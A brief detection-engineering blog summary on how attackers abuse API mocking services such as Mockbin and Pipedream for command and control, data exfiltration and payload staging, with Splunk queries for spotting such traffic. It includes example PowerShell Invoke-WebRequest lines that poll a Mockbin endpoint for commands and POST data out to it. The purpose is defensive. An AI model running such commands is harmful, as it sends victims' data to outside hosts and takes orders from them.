5 min read

Mockbin and the Art of Deception: Tracing Adversaries Going Headless

How attackers abuse API mocking services like Mockbin for C2, data exfiltration, and payload staging - and how to detect it.

mockbin c2 exfiltration api-abuse detection splunk

Originally published on the Splunk Security Blog
Read the full article: Mockbin and the Art of Deception

The Legitimate Service Problem

Mockbin, Pipedream, and similar API mocking services are legitimate developer tools. But their features make them perfect for attackers:

  • Free - No payment trail
  • Anonymous - Minimal registration
  • Flexible - Return any content type
  • Trusted - Often not blocked by proxies

Attack Use Cases

Command & Control

# Attacker creates Mockbin endpoint returning commands
https://mockbin.org/bin/[id]

# Malware polls endpoint for instructions
Invoke-WebRequest https://mockbin.org/bin/[id]

Data Exfiltration

# Exfil via POST to Mockbin
Invoke-WebRequest -Uri "https://mockbin.org/bin/[id]" -Method POST -Body $data

Payload Staging

Store encoded payloads that download and execute.

Detection Strategies

Network Indicators

index=proxy dest_host IN ("mockbin.org", "*.pipedream.net", "*.requestbin.com")
| stats count by src_ip, dest_host, uri_path, http_method
| sort -count

Suspicious PowerShell

index=sysmon EventCode=1 Image="*powershell*"
  CommandLine="*mockbin*" OR CommandLine="*pipedream*"
| table _time, Computer, User, CommandLine

DNS Queries

index=dns query IN ("mockbin.org", "*.pipedream.net")
| stats count by src_ip, query

Defense Recommendations

  • Block or alert on known API mocking services
  • Monitor for unusual outbound POST requests
  • Inspect traffic to free hosting services
  • Consider SSL inspection for high-risk domains

Read the full breakdown: Mockbin and the Art of Deception

Related Modules

Active

Atomics on a Friday

Weekly YouTube show exploring atomic tests, detection engineering, and security research. Live demonstrations and deep dives into attack techniques.

youtube atomic-red-team detection education +1
View Module → GitHub
Active

Bootloaders.io

A curated list of known malicious bootloaders for various operating systems. Track and catalog bootloader threats with detection rules and hash prevention.

bootloader bootkit detection defense +1
View Module → GitHub